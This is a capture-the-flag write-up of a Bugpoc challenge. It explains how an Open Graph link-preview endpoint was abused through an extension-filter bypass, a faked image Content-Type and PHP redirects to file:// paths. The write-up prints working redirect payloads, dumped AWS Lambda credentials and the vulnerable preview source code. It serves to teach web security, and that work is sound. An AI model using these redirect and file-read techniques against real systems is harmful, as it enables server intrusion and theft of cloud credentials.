Bugpoc challenge #3 – Local file inclusion (LFI)

$ Introduction:

Bugpoc is a bug bounty program that was private in first place, and now is public. Everyone is hitting Bugpoc to hack their platform. I like Bugpoc program, I never saw a team with high level of professionalism, high hacking spirit and quick response time in submission process.

We are all excited, and here we are with a new challenge and this one is different ! A local file inclusion (LFI). If you don’t know about the Local file inclusion here is a link for a quick definition: https://en.wikipedia.org/wiki/File_inclusion_vulnerability

Without further ado, grab a cup of coffee and let’s start hacking!

Challenge information: The vulnerable page: http://social.buggywebsite.com Rules: This challenge has one rule and it’s quite simple: find your way to the demon’s lair, the ” /etc/passwd“.

$ The web page:

As you can see, there is one input available, with limited options: 1- You can enter a text content to share. 2- Or, you can enter a URL to share.

If you put a simple text, all what you will get is a “Twitter” & “Reddit” buttons. On the other hand, if you put something shareable like a ” Facebook” or ” Reddit” URL, more buttons will appear as well as its content preview (See above image)

So, the questions that came up to my mind is how the content preview is generated? Why does it appear just when we put a shareable URL ? and why this is not the case for a simple text ?

To answer this, I had to make a research on that subject. I searched in google, I found that is something related to ” HTML Meta tags“. It wasn’t clear at first because I never experienced or had the chance to hack anything related to ” HTML Meta tags“.

So, I have to say something important here, don’t hesitate to talk to the community. Sometimes we spend too much time just to find one keyword, one hint, or something that will lead us to our answers. Thus, asking a friend doesn’t make you a cheater. It is much easier and you save plenty of time; indeed, that’s what I did. I asked a friend on discord ( Acut3 , a good hacker 👌 ) , he told me that I have to search for “Opengraph metadata”, and there, will be your answers . Later on, Bugpoc put the first hint, which confirm the Actu3’s clue.

I was surprised, about the “Meta tags” and the fact that contain a wealth of information that I never thought that it will be useful for me, until this very day.

<meta charset="UTF-8">
<title>Social Media Sharer</title>
<link href="https://fonts.googleapis.com/css?family=Poppins:400,800" rel="stylesheet">
<link href="style.css" rel="stylesheet">
<script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script><script src="script-min.js"> </script>
<link rel="shortcut icon" type="image/x-icon" href="favicon.ico">

<meta property="og:type" content="website">
<meta property="og:url" content="http://social.buggywebsite.com/">
<meta property="og:title" content="Buggy Social LFI Challenge">
<meta property="og:description" content="LFI CTF Challenge with cash prizes! Brought to you by bugpoc.com. Submit solutions to hackerone.com/bugpoc.">
<meta property="og:image" content="http://social.buggywebsite.com/ctf-info-img.jpg">
		
<meta property="twitter:card" content="summary_large_image">
<meta property="twitter:url" content="http://social.buggywebsite.com/">
<meta property="twitter:title" content="Buggy Social LFI Challenge">
<meta property="twitter:description" content="LFI CTF Challenge with cash prizes! Brought to you by bugpoc.com. Submit solutions to hackerone.com/bugpoc.">
<meta property="twitter:image" content="http://social.buggywebsite.com/ctf-info-img.jpg">

As you may noticed, the “Meta tags” section contains what we call the “Opengraph Metadata”.

Here is the Wikipedia definition:

The Open Graph protocol developed by Facebook, enables developers to integrate their pages into Facebook’s global mapping/tracking tool Social Graph. These pages gain the functionality of other graph objects including profile links and stream updates for connected users. OpenGraph tags in HTML5 might look like this:

<meta charset="utf-8" />
<meta name="viewport" content="width=device-width" />
<meta property="og:title" content="Example title of article" />
<meta property="og:site_name" content="example.com website" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://example.com/example-title-of-article" />
<meta property="og:image" content="http://example.com/article_thumbnail.jpg" />

What’s in the above image, is an example of the ” OpenGraph Tags“. The ” og:image” tag, It’s the most important one, because it occupies the most social feed real estate and that’s what you use when you’d like to represent your content.

Now, we all know how the content is loaded, and how the image is generated. This give us an understanding on how the application works, and what’s the purpose of ” Opengraph meta tags“. I know, you want to know more …

$ The Server Endpoint:

Using burp, I entered a shareable Reddit URL, which means it has ” og:image “. I intercepted the HTTP request like this:

The server ” api.buggywebsite.com” has an endpoint called ” website-preview” which takes an address URL from a parameter called ” url“. The server read the metadata and try to get the data it needs that exists in the URL (https://www.reddit.com/r/MMA)

Here below the response:

What’s interesting in the response, is the Base64 encoded image. The server has no problem getting the image. Question: What will happen if we try to put a domain which we control in the ” url” parameter ? Hein, I feel like you think about something malicious don’t you ? Hold on there … 😋

$ The Malicious Server:

I created an “Index.html” in my webserver:

In the image, the ” og:image” points to my server. The ” api.buggywebsite.com” will respond with ” Base64” encoded image residing in my server. Nothing special here …

Wait, Maybe you’re now thinking about putting an SVG file in place of ” img.jpg” ? Since we can manipulate XML under an SVG, there’s a high chance of an XXE vulnerability in there, right ? and by that, I mean we can read ” /etc/passwd“. If this is what you thought about, you’re right !!! I have thought it about too… 😇

Let’s try your idea then, I created an ” img.svg” file containing the famous XXE payload:

I went back to my ” Index.html” and I changed ” img.jpg” to ” img.svg“:

So, let’s send the request to the vulnerable server:

Below is the request:

Below is the response:

What ?? The server doesn’t process the SVG file at all, it just shows its content … 😕

I tried so many different payloads, unfortunately it does not work. Well, how to put it, the XXE idea, just drop it, it will lead us nowhere. I had to think of something new, I felt that I’m missing something, google didn’t helped me out a lot, I was going from a website to another searching here and there for an article, a hint. Unfortunately, couldn’t figure out what was the next step. I took a break, and later, a question …

I once heard someone say: ” There’s nothing dangerous than a good question“.

What if I put ” PHP” file in instead of ” SVG” file ?

Eureka !! A whole new world of possibilities had emerged in front of my eye s:

Since the SVG file doesn’t seem to be processed, what if we put in the PHP file a redirection using ” header(‘Location: file:///etc/passwd’)“, and by that, we force the server to go wherever we want ?

Let me show you my idea through a diagram:

So, the idea here was to redirect the vulnerable server to read its internal files by itself.

I’m not quite sure about putting the ” PHP” file in ” og:image” meta tag since I never saw that before … Nevertheless, in the hacking world, we have to try everything, and we have nothing to lose. So, let’s try that out too.

The PHP file will be as follows:

<?php
	header("Location: file:///etc/passwd");
?>

We will ensure that the PHP file will be only responsible to redirect the server to go to ” file:///etc/passwd“

Below is the ” Index.html“:

We will create an HTML file, from where the server will get what it needs. As you can see, in the ” og:image” the content will be changed to ” http://myserver.com/calc/index.php“

We call again the ” website-preview” endpoint, and surprise !!! 😆

The server is checking whether the request contains a valid image URL or not. In our case, the check failed because we gave him a ” PHP” file. The server has a mechanism to test the file extensions given in the URL, and we know very well that there are multiple ways how to bypass extension file filtering. As example, we can add next to the file a “?”,”#”or “.” … I will try first the “?” symbol

The final URL i n the ” index.html ” page will be like:

<meta
  property="og:image"
  content="http://www.myserver.com/calc/index.php?.svg"
/>

We will send again the request, and now, the server responds with another error:

A HEAD Test ??? Is it a HEAD Http request ? Maybe is testing for the content-type ? Hmm, interesting … let’s find out the request and what did contain as a ” Content-type“. I will try to call the ” index.php” file and see how the response will look like ? and what does contain in its ” Content-type” ?

Okay, it’s a ” Text/Html“, that’s the reason behind the “Image Failed HEAD Test”. The server has now two check mechanisms: ” Extension type” & ” content-type entity header“. Now, we have all our answers … don’t we ?

Going back to the PHP file, we have to specify the content-type that corresponds to the file specified in the ” og:image” URL, which in our case is a SVG:


<?php
    $headers = array(
   'Location' = 'file:///etc/passwd',
   'Content-Type' = 'image/svg',
    );
    
    foreach ($headers as $headerType = $headerValue)
    {
        header($headerType . ': ' . $headerValue);
    }
?>

The PHP code’s not mine, I found it in Stackoverflow forum. I tested the code in my server and it seems to work fine.

This is our last resort ☝, we are tired of this, multiple security layers, multiple obstacles, but you know, the hacker perseverance never lose against the evil ” laziness“. 😈

Sending our request, we got the response, and … BOOM !!

Holy *$!?#* !! This time we hit where we should !! The ” /etc/passwd” is ours, see the dump in burp. Mission Complete !! And this is where our journey ends.

To summarize the steps:

1- We send a request to the vulnerable server containing our URL.

2- The vulnerable server will get the malicious URL and try to get its metadata.

3- The vulnerable server will process the content of the URL, which contain a redirection.

4- The vulnerable server will be redirected to read its internal files. The redirection grab the ” file:///etc/passwd” specified in the redirection and send it back to the attacker.

$ Conclusion:

I must admit, the challenge was not that easy ! The key was persistence and trying different combinations. Sometimes, asking the good questions is the 50 % of the answers. Whatever the obstacles, don’t just try to think out of the box, but in new boxes.

Sometimes you can’t get answers or responses, the power of it, is that it gives you the opportunity to look inside yourself and bring out your full potential.

This write-up is something that may help others, It will be as a reference for people who are interested in the same subject, or curious to know about hacking methodology. This will be considered as a backup too, kind of a guide for my future findings.

I tried to give more details about the steps as much as I could, to help you build a mental image of the whole hacking process. For those who didn’t manage to solve the challenge in time, there will be more from ” Bugpoc ” (Surely). They will try their best to give a quality hacking content and challenges.

If you have any question or comment about my write-up, techniques, join me on Twitter. I’ll be happy to answer your question, listen to your ideas and share my little modest knowledge with you.

$ BONUS – Aws Metadata & Source code:

The last day of the challenge, Bugpoc announced that there is a bonus points if we could manage to reveal the cloud metadata as well as the source code involved in this challenge. Let’s resolve this one too:

Step 1:

The first thing I did, is to identify which cloud platform I’m targeting. I already knew that was a AWS. However, I was wondering which one is being used EC2 or Lambda ?

I tried to use the famous URL to extract the metadata from Amazon AWS:

http://169.254.169.254/latest/meta-data

Unfortunately, it didn’t work. I got the error that connection is refused. Hmm, the question that came up to my mind is: Is there any other way to get the metadata from the environment itself ? Without executing a single command.

After a little bit of googling, I found out that the cloud metadata is also stored in ” /proc/self/environ“. Soooo, let’s go mug em !!! 😁

Changing the ” index.php” to:

<?php
 	$headers = array(
   'Location' => 'file:///proc/self/environ',
   'Content-Type' => 'image/svg',
    );
    
    foreach ($headers as $headerType => $headerValue)
    {
        header($headerType . ': ' . $headerValue);
    }
?>

I sent the request to the server using burp and I got this response:

Cool !!! Let’s prettify this little angel 👶:

AWS_LAMBDA_FUNCTION_VERSION=$LATEST
AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEMj//////////wEaCXVzLXdlc3QtMiJHMEUCIHA6iWmmyeWY/Z0XEzUrBrcwR7PVGuJeqRNHnBHN/6mZAiEAkEOpPunx4c5TuhM4Q/VIeyVQCH9+uzSHkiJOLVNNtmcq2wEI8f//////////ARABGgwwMTA1NDQ0MzkyMTAiDGNVdnhQyYseDG/7KiqvAZNJlIm6R2pGf+A5LwHSd6G6SOXFdk2QldSPGtTdzilRvQHLKDueCh3YyyNeTVmzQakWdDXnuTNvGeDFmt2rwV5GzEL8C+vfP0d1AU1W54SsQ8arOi1y1iIFq4Tbyii1vfrenfu7vmPTeQeS7OUVYcSpunByqfzz699Xog/5nwMpWyCQcMpCXW4DaAubGyB3tDS/WkrOplQbTS8o8f+9XY8xpsPSUwqHycf8gRROVAYw1qry+wU64AHIY/mia4i0wj3IA7texbS3/Xk0lsNiRLqQ4ux3XB5xNV8gtJeB72A5dIKwDG/AUsNTa1aVgT61Z7yDCRmn6s56VS+XhuCjjA0bfjehu5OOLFdbkxx3wso8QU2dwWgJts3pABp370dXcrudYBs2f+p26k2cgO4jEMQfRIgWHL01UoW+vxlqiW6k1siBvqtEKq+QpJRV+KwsqVJD1idCfYaosCH5Vhv47lCH8DOyja4/vy5BMAYMz6ScWXkODbtLvhSXVK5/3o7B5Nz8KbpFMokwozuBsFSaA9dOkYXJKZ88eg==
LAMBDA_TASK_ROOT=/var/task
LD_LIBRARY_PATH=/var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib
AWS_LAMBDA_LOG_GROUP_NAME=/aws/lambda/get-website-preview
AWS_LAMBDA_RUNTIME_API=127.0.0.1:9001
AWS_LAMBDA_LOG_STREAM_NAME=2020/10/06/[$LATEST]a0b4c04d5e0f41988ac407a870abf50d
AWS_EXECUTION_ENV=AWS_Lambda_python3.8
AWS_XRAY_DAEMON_ADDRESS=169.254.79.2:2000
AWS_LAMBDA_FUNCTION_NAME=get-website-preview
PATH=/var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin
AWS_DEFAULT_REGION=us-west-2
PWD=/var/task
AWS_SECRET_ACCESS_KEY=mbjyuvpKSKzW49z9YuPutTJ8JqFQNIphsg/cemfh
LANG=en_US.UTF-8
LAMBDA_RUNTIME_DIR=/var/runtime
AWS_REGION=us-west-2
TZ=:UTC
AWS_ACCESS_KEY_ID=ASIAQE5D7L6VFRCHZ662
SHLVL=0
_AWS_XRAY_DAEMON_ADDRESS=169.254.79.2
_AWS_XRAY_DAEMON_PORT=2000
_LAMBDA_TELEMETRY_LOG_FD=3
AWS_XRAY_CONTEXT_MISSING=LOG_ERROR
_HANDLER=lambda_function.lambda_handler
AWS_LAMBDA_FUNCTION_MEMORY_SIZE=512

As we can see, it’s a Lambda instance. This terminate our first mission. We have now the cloud metadata. Great !! ✌

Step 2:

How to extract the source code existing in the server ?

To answer this, we can see clearly in the extracted ” Metadata” that there are these indicators which tell us more about where we can find the source code as well as the path where it resides:

_Handler=lambda_function.lambda_handler
Lambda_Task_Root=/var/task

The ” lambda_handler” is a function inside a python file called ” lambda_function.py” and the ” Lambda_Task_Root” telling us where the file is located. Thus, we have the path and the filename. What’s remaining now is to extract that file from the server.

Changing the ” index.php” file to this:

<?php
    $headers = array(
   'Location' => 'file:///var/task/lambda_function.py',
   'Content-Type' => 'image/svg',
    );
    
    foreach ($headers as $headerType => $headerValue)
    {
        header($headerType . ': ' . $headerValue);
    }
?>

Sending the request, I got this:

Let’s clean our code, and here is the final result:

import json
import requests
from bs4 import BeautifulSoup
from urllib.parse import urlparse
import fleep
import base64
import os
import sys
from urllib.request import url2pathname

class LocalFileAdapter(requests.adapters.BaseAdapter):
    """Protocol Adapter to allow Requests to GET file:// URLs

    @todo: Properly handle non-empty hostname portions.
    """

    @staticmethod
    def _chkpath(method, path):
        """Return an HTTP status for the given filesystem path."""
        if method.lower() in ('put', 'delete'):
            return 501, "Not Implemented"  # TODO
        elif method.lower() not in ('get', 'head'):
            return 405, "Method Not Allowed"
        elif os.path.isdir(path):
            return 400, "Path Not A File"
        elif not os.path.isfile(path):
            return 404, "File Not Found"
        elif not os.access(path, os.R_OK):
            return 403, "Access Denied"
        else:
            return 200, "OK"

    def send(self, req, **kwargs):
        # pylint: disable=unused-argument
        """Return the file specified by the given request

        @type req: C{PreparedRequest}
        @todo: Should I bother filling `response.headers` and processing
               If-Modified-Since and friends using `os.stat`?
        """
        path = os.path.normcase(os.path.normpath(url2pathname(req.path_url)))
        response = requests.Response()

        response.status_code, response.reason = self._chkpath(req.method, path)
        if response.status_code == 200 and req.method.lower() != 'head':
            try:
                response.raw = open(path, 'rb')
            except (OSError, IOError) as err:
                response.status_code = 500
                response.reason = str(err)

        if isinstance(req.url, bytes):
            response.url = req.url.decode('utf-8')
        else:
            response.url = req.url

        response.request = req
        response.connection = self

        return response

    def close(self):
        pass

def get_og(url):
    r = requests.get(url,headers={'user-agent':'Buggybot/1.0'})
    soup = BeautifulSoup(r.text, 'html.parser')
    metas = soup.find_all('meta', attrs={"property":True})
    ogs = {meta['property']:meta['content'] for meta in metas if meta['property'].startswith('og:')}
    return {
        'title':ogs.get('og:title',''),
        'description':ogs.get('og:description',''),
        'image_url':ogs.get('og:image',''),
    }

def get_image_bytes(image_url):
    # set up requests session like stack overflow told me to
    requests_session = requests.session()
    requests_session.mount('file://', LocalFileAdapter())
    # verify the thing we are about to download is an image
    r_head = requests_session.head(image_url, stream=True, headers={'user-agent':'Buggybot/1.0'})
    if not ('image' in r_head.headers.get('Content-Type') or 'image' in r_head.headers.get('content-type')):
        raise Exception("Image Failed HEAD Test")
    # download thing
    r = requests_session.get(image_url, stream=True, headers={'user-agent':'Buggybot/1.0'})
    img = r.content
    return img

def get_image_mimetype(image_bytes):
    f = fleep.get(image_bytes)
    if len(f.mime) > 0:
        return f.mime[0]
    else:
        return ''
    
valid_image_extensions = ['.jpg','.png','.gif','.svg']
def get_image_content(image_url):
    # verify the url has an acceptable extension
    has_valid_extension = any([ext in image_url for ext in valid_image_extensions])
    # verify the url starts with http
    if image_url.startswith('http') and has_valid_extension:
        # download the image content
        image_bytes = get_image_bytes(image_url)
        if image_bytes == None:
            raise Exception('Not Found')
        # check file magic bytes
        mimetype = get_image_mimetype(image_bytes)
        if '.jpg' in image_url and mimetype == 'image/jpeg':
            return (base64.b64encode(image_bytes),True,mimetype)
        elif '.png' in image_url and mimetype == 'image/png':
            return (base64.b64encode(image_bytes),True,mimetype)
        elif '.gif' in image_url and mimetype == 'image/gif':
            return (base64.b64encode(image_bytes),True,mimetype)
        elif '.svg' in image_url:
            # svg is basically a text file. no need to look at magic bytes
            return (image_bytes ,False,'image/svg+xml')
        else:
            raise Exception('Unable to Process Image')
    else:
        raise Exception('Invalid Image URL')
    
def lambda_handler(event, context):

    try:
        # get url from request
        body = event.get('body','')
        json_body = json.loads(body)
        url = json_body['url']
        
        # get the request time
        request_time = int(json_body['requestTime'])
        
        # get open graph data
        og_data = get_og(url)
        
        # add the request time
        og_data['requestTime'] = request_time;
        
        # add parsed domain
        og_data['domain'] = urlparse(url).netloc
        
        if og_data['image_url'] != '':
            try:
                # attempt to download the image content
                (img,needed_encoding,mimetype) = get_image_content(og_data['image_url'])
                img_json = {
                    'content' : img.decode(),
                    'encoded' : needed_encoding,
                    'mimetype' : mimetype
                }
                og_data['image'] = img_json
            except Exception as e:
                og_data['image'] = {'error':str(e)}
                
        # remove the og:image
        del og_data['image_url']
        
        return {
            'statusCode': 200,
            'body': json.dumps(og_data),
            'headers': {'access-control-allow-origin': '*'}
        }
    except Exception as e:
        return {
            'statusCode': 400,
            'body':'Error, unable to fetch website preview',
            'headers': {'access-control-allow-origin': '*'}
        }

We have succeeded in our mission, and now you have a clear idea about the steps involved in this hacking challenge.